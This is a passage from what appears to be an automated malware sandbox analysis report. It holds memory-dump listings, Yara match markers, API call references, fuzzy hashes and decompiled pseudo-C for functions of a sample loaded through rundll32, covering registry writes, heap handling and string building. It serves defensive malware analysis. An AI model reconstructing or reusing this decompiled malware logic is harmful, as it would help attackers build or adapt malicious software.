                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 357dd47953c5bb792ca70e8fc5cbabb187f45fcee7ea309e51abfe8837dc5aa7
                                                          • Instruction ID: 8431deb419103cb948d46c6501f9894059761e445c147df835a86d1d7ab46da9
                                                          • Opcode Fuzzy Hash: 357dd47953c5bb792ca70e8fc5cbabb187f45fcee7ea309e51abfe8837dc5aa7
                                                          • Instruction Fuzzy Hash: C4F03470E062819BD720FFA8ED48F0A7BE8AB50740B08A409F901C626DD330E870CB1A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628A477
                                                          • memcpy.NTDLL ref: 0628A49F
                                                            • Part of subcall function 06287950: NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                            • Part of subcall function 06287950: RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                            • Part of subcall function 06287950: SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          • GetLastError.KERNEL32(00000010,00000218,0629386D,00000100,?,00000318,00000008), ref: 0628A4B6
                                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0629386D,00000100), ref: 0628A599
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 685050087-0
                                                          • Opcode ID: 91c8998d442aeab2e9912c1daca1ba4baa7416fbdbc554debb58459a74d7863f
                                                          • Instruction ID: abec4e23efcfbf9a48560e43f202cd8d3ed173787f47ac524aeb77cb82057b90
                                                          • Opcode Fuzzy Hash: 91c8998d442aeab2e9912c1daca1ba4baa7416fbdbc554debb58459a74d7863f
                                                          • Instruction Fuzzy Hash: 404198B15157019FD7A1EF24DC41B9BB7E9BF88310F00892DF999C6190EB70D554CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D216C(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				void* _t26;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				void* _t37;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E036D3695(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x36da348; // 0x228d5a8
                                                          				_t4 = _t24 + 0x36dbe58; // 0x5969400
                                                          				_t5 = _t24 + 0x36dbe00; // 0x4f0053
                                                          				_t26 = E036D155C( &_v16, _v8, _t5, _t4); // executed
                                                          				_t45 = _t26;
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x36da348; // 0x228d5a8
                                                          						_t11 = _t32 + 0x36dbe4c; // 0x59693f4
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x36dbe00; // 0x4f0053
                                                          						_t52 = E036D28C4(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x36da348; // 0x228d5a8
                                                          							_t13 = _t35 + 0x36dba51; // 0x30314549
                                                          							_t37 = E036D41FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                          							if(_t37 == 0) {
                                                          								_t61 =  *0x36da2fc - 6;
                                                          								if( *0x36da2fc <= 6) {
                                                          									_t42 =  *0x36da348; // 0x228d5a8
                                                          									_t15 = _t42 + 0x36dbde2; // 0x52384549
                                                          									E036D41FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x36da348; // 0x228d5a8
                                                          							_t17 = _t38 + 0x36dbe90; // 0x5969438
                                                          							_t18 = _t38 + 0x36dbe68; // 0x680043
                                                          							_t45 = E036D74B6(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x36da2d8, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x36da2d8, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E036D3AC2(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05969400,00000000,?,76CDF710,00000000,76CDF730), ref: 036D21BB
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05969438,?,00000000,30314549,00000014,004F0053,059693F4), ref: 036D2258
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,036D66BE), ref: 036D226A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: a9142a5f26beebc30d076b019eabcabe48bbcb98317ec21e54d0f02703118de0
                                                          • Instruction ID: 420a8a10266c02c671573fa6948c0a9562b3808c23496e4a9f96c7b53f58cfab
                                                          • Opcode Fuzzy Hash: a9142a5f26beebc30d076b019eabcabe48bbcb98317ec21e54d0f02703118de0
                                                          • Instruction Fuzzy Hash: 8D31E236D0020CBFCB11EBD5DC84EAE7BBDEB48700F1A0159F600AB259D7B19A15DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E036D43EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                          				void* _v8;
                                                          				char _v48;
                                                          				void* __edi;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t30;
                                                          				intOrPtr _t34;
                                                          				intOrPtr* _t42;
                                                          				void* _t43;
                                                          				void* _t46;
                                                          				intOrPtr* _t48;
                                                          				void* _t49;
                                                          				intOrPtr _t51;
                                                          
                                                          				_t42 = _a16;
                                                          				_t48 = __eax;
                                                          				_t22 =  *0x36da348; // 0x228d5a8
                                                          				_t2 = _t22 + 0x36db67a; // 0x657a6973
                                                          				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                                                          				if( *0x36da2ec >= 5) {
                                                          					_t30 = E036D56C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                                                          					L5:
                                                          					_a4 = _t30;
                                                          					L6:
                                                          					if(_a4 != 0) {
                                                          						L9:
                                                          						 *0x36da2ec =  *0x36da2ec + 1;
                                                          						L10:
                                                          						return _a4;
                                                          					}
                                                          					_t50 = _a16;
                                                          					 *_t48 = _a16;
                                                          					_t49 = _v8;
                                                          					 *_t42 = E036D708D(_t50, _t49); // executed
                                                          					_t34 = E036D2B23(_t49, _t50); // executed
                                                          					if(_t34 != 0) {
                                                          						 *_a8 = _t49;
                                                          						 *_a12 = _t34;
                                                          						if( *0x36da2ec < 5) {
                                                          							 *0x36da2ec =  *0x36da2ec & 0x00000000;
                                                          						}
                                                          						goto L10;
                                                          					}
                                                          					_a4 = 0xbf;
                                                          					E036D561E();
                                                          					HeapFree( *0x36da2d8, 0, _t49);
                                                          					goto L9;
                                                          				}
                                                          				_t51 =  *0x36da3e0; // 0x5969b78
                                                          				if(RtlAllocateHeap( *0x36da2d8, 0, 0x800) == 0) {
                                                          					_a4 = 8;
                                                          					goto L6;
                                                          				}
                                                          				_t30 = E036D300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                                                          				goto L5;
                                                          			}

                                                          APIs
                                                          • wsprintfA.USER32 ref: 036D440D
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D4432
                                                            • Part of subcall function 036D300E: GetTickCount.KERNEL32 ref: 036D3025
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3072
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D308F
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D30B1
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D30D8
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3103
                                                            • Part of subcall function 036D300E: HeapFree.KERNEL32(00000000,?), ref: 036D3116
                                                            • Part of subcall function 036D300E: wsprintfA.USER32 ref: 036D3135
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 036D44AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$AllocateCountTick
                                                          • String ID:
                                                          • API String ID: 1307794992-0
                                                          • Opcode ID: b1aea64a54a9a82af790bc95fb0525e5a059d767595b633a09d468b7d3c9e462
                                                          • Instruction ID: 48a5d42bab65909311a1be79ba00e1708d714c1a1fdda7bddbf1b62677115a1e
                                                          • Opcode Fuzzy Hash: b1aea64a54a9a82af790bc95fb0525e5a059d767595b633a09d468b7d3c9e462
                                                          • Instruction Fuzzy Hash: 09315E75D01208EFCB01EFA6D884E9A3BBCFB08344F148016F905EB254DB70DAA5CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,06299068,0627E6ED,00000001,00000000,0689C314,0629906E,00000000,00000000,0628CB01,0689C314,75BCC740,00000000), ref: 06286C72
                                                          • RegSetValueExA.KERNEL32(06299068,00000003,00000000,00000003,06299068,00000028), ref: 06286CB3
                                                          • RegCloseKey.ADVAPI32(?), ref: 06286CBF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: c922fce9960025ad7c745d92c3997983efcc0485775a5069cbeb6f2cb64cae53
                                                          • Instruction ID: aadb76e803333a42e67bc88b2b0e8a745dd0afc5c438e44f8d7ddac265b52282
                                                          • Opcode Fuzzy Hash: c922fce9960025ad7c745d92c3997983efcc0485775a5069cbeb6f2cb64cae53
                                                          • Instruction Fuzzy Hash: 9C314471D11329EFDFA1DF94EC4899EBBB9EB84724F14415AEE14A3280D3754A84CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E036D3B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                                          				char _v5;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				char _t28;
                                                          				void* _t33;
                                                          				void* _t38;
                                                          				void* _t45;
                                                          				char* _t46;
                                                          				void* _t48;
                                                          				char* _t56;
                                                          				char* _t57;
                                                          				intOrPtr _t59;
                                                          				void* _t60;
                                                          
                                                          				_t56 = _a4;
                                                          				_t60 = __eax;
                                                          				_v12 = 0xb;
                                                          				if(_t56 != 0 && __eax != 0) {
                                                          					_t5 = _t60 - 1; // -1
                                                          					_t46 =  &(_t56[_t5]);
                                                          					_t28 =  *_t46;
                                                          					_v5 = _t28;
                                                          					 *_t46 = 0;
                                                          					__imp__(_a8, _t45);
                                                          					_v16 = _t28;
                                                          					_t57 = StrStrA(_t56, _a8);
                                                          					if(_t57 != 0) {
                                                          						 *_t46 = _v5;
                                                          						_t33 = RtlAllocateHeap( *0x36da2d8, 0, _a16 + _t60); // executed
                                                          						_t48 = _t33;
                                                          						if(_t48 == 0) {
                                                          							_v12 = 8;
                                                          						} else {
                                                          							_t58 = _t57 - _a4;
                                                          							E036D7A1E(_t57 - _a4, _a4, _t48);
                                                          							_t38 = E036D7A1E(_a16, _a12, _t58 + _t48);
                                                          							_t53 = _v16;
                                                          							_t59 = _a16;
                                                          							E036D7A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                                          							 *_a20 = _t48;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							 *_a24 = _t60 - _v16 + _t59;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 036D3B8C
                                                          • StrStrA.SHLWAPI(00000000,?), ref: 036D3B99
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D3BB8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 556738718-0
                                                          • Opcode ID: 9cb9c38bb8c17c3ad3441c53ff137ec6e5f377f2a5860c2266b27b70ef7553a8
                                                          • Instruction ID: 01ac27968b2ad0a8dcd65064f6f0eeb1ef0d3e441bde35efcdd569b5ec0e0ab4
                                                          • Opcode Fuzzy Hash: 9cb9c38bb8c17c3ad3441c53ff137ec6e5f377f2a5860c2266b27b70ef7553a8
                                                          • Instruction Fuzzy Hash: EB21BE3AA04249AFCF11DF68C884B9EBFB5EF85310F188154EC04AB309C731EA55CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0629087A: lstrlen.KERNEL32(?,00000000,0628BA3E,00000027,0629A1E8,?,00000000,?,?,0628BA3E,?,00000001,?,06280971,00000000,?), ref: 062908B0
                                                            • Part of subcall function 0629087A: lstrcpy.KERNEL32(00000000,00000000), ref: 062908D4
                                                            • Part of subcall function 0629087A: lstrcat.KERNEL32(00000000,00000000), ref: 062908DC
                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 062762A8
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 062762BE
                                                          • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 06276307
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 4131162436-0
                                                          • Opcode ID: c0ad1c89150cfc5b1b62bf193cf1ac24db22e7693bb2f925fda6a3c939090700
                                                          • Instruction ID: d4fe976318c9774a834745291d3911054ae17ba335ca113f8e7619475f81cd8f
                                                          • Opcode Fuzzy Hash: c0ad1c89150cfc5b1b62bf193cf1ac24db22e7693bb2f925fda6a3c939090700
                                                          • Instruction Fuzzy Hash: 96214D71D10209BFDB41DFD5DC85CEEBBBDEB45254B104069EA10A3111E770AE59DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E036D6E6D(char* _a4, char** _a8) {
                                                          				char* _t7;
                                                          				char* _t11;
                                                          				char* _t14;
                                                          				char* _t16;
                                                          				char* _t17;
                                                          				char _t18;
                                                          				signed int _t20;
                                                          				signed int _t22;
                                                          
                                                          				_t16 = _a4;
                                                          				_push(0x20);
                                                          				_t20 = 1;
                                                          				_push(_t16);
                                                          				while(1) {
                                                          					_t7 = StrChrA();
                                                          					if(_t7 == 0) {
                                                          						break;
                                                          					}
                                                          					_t20 = _t20 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t7[1]));
                                                          				}
                                                          				_t11 = E036D6D63(_t20 << 2);
                                                          				_a4 = _t11;
                                                          				if(_t11 != 0) {
                                                          					StrTrimA(_t16, 0x36d9284); // executed
                                                          					_t22 = 0;
                                                          					do {
                                                          						_t14 = StrChrA(_t16, 0x20);
                                                          						if(_t14 != 0) {
                                                          							 *_t14 = 0;
                                                          							do {
                                                          								_t14 =  &(_t14[1]);
                                                          								_t18 =  *_t14;
                                                          							} while (_t18 == 0x20 || _t18 == 9);
                                                          						}
                                                          						_t17 = _a4;
                                                          						 *(_t17 + _t22 * 4) = _t16;
                                                          						_t22 = _t22 + 1;
                                                          						_t16 = _t14;
                                                          					} while (_t14 != 0);
                                                          					 *_a8 = _t17;
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,059695AC,?,?,036D76A6,?,059695AC), ref: 036D6E89
                                                          • StrTrimA.SHLWAPI(?,036D9284,00000002,?,036D76A6,?,059695AC), ref: 036D6EA7
                                                          • StrChrA.SHLWAPI(?,00000020,?,036D76A6,?,059695AC), ref: 036D6EB2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: fea75adafd40a28c9a0eed0735da72bcad8719f363ae0b2addc50efa211343fd
                                                          • Instruction ID: 073ee52e4ae357228f05f80086698231049d72599848176cba822f21a8a84ef8
                                                          • Opcode Fuzzy Hash: fea75adafd40a28c9a0eed0735da72bcad8719f363ae0b2addc50efa211343fd
                                                          • Instruction Fuzzy Hash: 76018F71B083566FE720DA6ACD48F67BF9DEBC9650F881011F955CB382DA70D852C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E036D7928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				void _v60;
                                                          				char _v64;
                                                          				long _t14;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t19;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          
                                                          				_t27 = __edi;
                                                          				_t26 = _a8;
                                                          				_t14 = E036D3F07(_a4, _t26, __edi); // executed
                                                          				_t28 = _t14;
                                                          				if(_t28 != 0) {
                                                          					memset( &_v60, 0, 0x38);
                                                          					_t18 =  *0x36da348; // 0x228d5a8
                                                          					_t28 = 0;
                                                          					_v64 = 0x3c;
                                                          					if(_a12 == 0) {
                                                          						_t7 = _t18 + 0x36db4e0; // 0x70006f
                                                          						_t19 = _t7;
                                                          					} else {
                                                          						_t6 = _t18 + 0x36db8f4; // 0x750072
                                                          						_t19 = _t6;
                                                          					}
                                                          					_v52 = _t19;
                                                          					_push(_t28);
                                                          					_v48 = _a4;
                                                          					_v44 = _t26;
                                                          					_v36 = _t27;
                                                          					E036D23AA();
                                                          					_push( &_v64);
                                                          					if( *0x36da100() == 0) {
                                                          						_t28 = GetLastError();
                                                          					}
                                                          					_push(1);
                                                          					E036D23AA();
                                                          				}
                                                          				return _t28;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(00000000), ref: 036D3F61
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(0070006F), ref: 036D3F75
                                                            • Part of subcall function 036D3F07: SysAllocString.OLEAUT32(00000000), ref: 036D3F87
                                                          • memset.NTDLL ref: 036D794B
                                                          • GetLastError.KERNEL32 ref: 036D7997
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocString$ErrorLastmemset
                                                          • String ID: <
                                                          • API String ID: 3736384471-4251816714
                                                          • Opcode ID: 69c996b20d295bc90db02b29c705648c030fa469086739f537c875831e973ebb
                                                          • Instruction ID: ed76b6fda50bab80ce72e9e9d0c24ad22e9402d752ac89277bef2c9817743307
                                                          • Opcode Fuzzy Hash: 69c996b20d295bc90db02b29c705648c030fa469086739f537c875831e973ebb
                                                          • Instruction Fuzzy Hash: C6014076D01318AFCB10EFA9D884EDEBBB8BB08740F454169F905EB248D77095148B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                          • RegOpenKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7C3
                                                          • lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateOpenlstrlen
                                                          • String ID:
                                                          • API String ID: 2865187142-0
                                                          • Opcode ID: 4161a26aa39d12ede6a050e853f39000fcefd3cba305fc99ecc24c1568588158
                                                          • Instruction ID: 75bfabcac180dbfc47ba0dea37f39169ba45e6f98b9031ec1d585739c89351d1
                                                          • Opcode Fuzzy Hash: 4161a26aa39d12ede6a050e853f39000fcefd3cba305fc99ecc24c1568588158
                                                          • Instruction Fuzzy Hash: BAF0F676511308BFE751AF54DC98FAA7B7CEF45765F10800DFE0289280D6709680CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetEvent.KERNEL32(000005A0,0628C3DB), ref: 0628E83B
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 06273528
                                                            • Part of subcall function 062734FF: RtlDeleteCriticalSection.NTDLL(0629A3E0), ref: 0627355B
                                                            • Part of subcall function 062734FF: RtlDeleteCriticalSection.NTDLL(0629A400), ref: 06273562
                                                            • Part of subcall function 062734FF: ReleaseMutex.KERNEL32(000005C0,00000000,?,?,?,0628E846), ref: 0627358B
                                                            • Part of subcall function 062734FF: FindCloseChangeNotification.KERNEL32(?,?,0628E846), ref: 06273597
                                                            • Part of subcall function 062734FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0628E846), ref: 062735A3
                                                            • Part of subcall function 062734FF: CloseHandle.KERNEL32(?,?,0628E846), ref: 062735AF
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 062735B5
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 062735C9
                                                            • Part of subcall function 062734FF: HeapFree.KERNEL32(00000000,00000000,?,?,0628E846), ref: 062735ED
                                                            • Part of subcall function 062734FF: RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 06273623
                                                            • Part of subcall function 062734FF: SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 0627363F
                                                          • CloseHandle.KERNEL32(000005A0), ref: 0628E850
                                                          • HeapDestroy.KERNELBASE(064A0000), ref: 0628E860
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$Close$CriticalDeleteEventHandleHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                                          • String ID:
                                                          • API String ID: 3503058985-0
                                                          • Opcode ID: 8aeea4c1dbcef60b58847aa88af4b76fde07476460876ac8eda3847742d096cc
                                                          • Instruction ID: b1857e3b2857eaf715cb2fe5a583fd8171dcb2f2094dc1d3c8eb52872837036e
                                                          • Opcode Fuzzy Hash: 8aeea4c1dbcef60b58847aa88af4b76fde07476460876ac8eda3847742d096cc
                                                          • Instruction Fuzzy Hash: 5AE01270B113425FDB61AF35FC5CE0A33DA6B856857490424BA16D2150DB30C440FE30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D2575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				int _v12;
                                                          				signed int _v16;
                                                          				void* _v20;
                                                          				signed char _v36;
                                                          				void* _t24;
                                                          				intOrPtr _t27;
                                                          				void* _t35;
                                                          				signed int _t38;
                                                          				signed char* _t46;
                                                          				int _t53;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          
                                                          				_v16 = _v16 & 0x00000000;
                                                          				_t46 = _a4;
                                                          				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                                          				_v12 = 0x110;
                                                          				_t24 = E036D6D63(_t53);
                                                          				_a4 = _t24;
                                                          				if(_t24 != 0) {
                                                          					memcpy(_t24,  *0x36da378, 0x110);
                                                          					_t27 =  *0x36da37c; // 0x0
                                                          					_t57 = _t56 + 0xc;
                                                          					if(_t27 != 0) {
                                                          						_t51 = _a4;
                                                          						E036D138A(0x110, _a4, _a4, _t27, 0);
                                                          					}
                                                          					if(E036D6BF2( &_v36) != 0) {
                                                          						_t35 = E036D5FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                                          						if(_t35 == 0) {
                                                          							_t55 = _v20;
                                                          							_v36 =  *_t46;
                                                          							_t38 = E036D13C7(_t55, _a8, _t51, _t46, _a12); // executed
                                                          							_v16 = _t38;
                                                          							 *(_t55 + 4) = _v36;
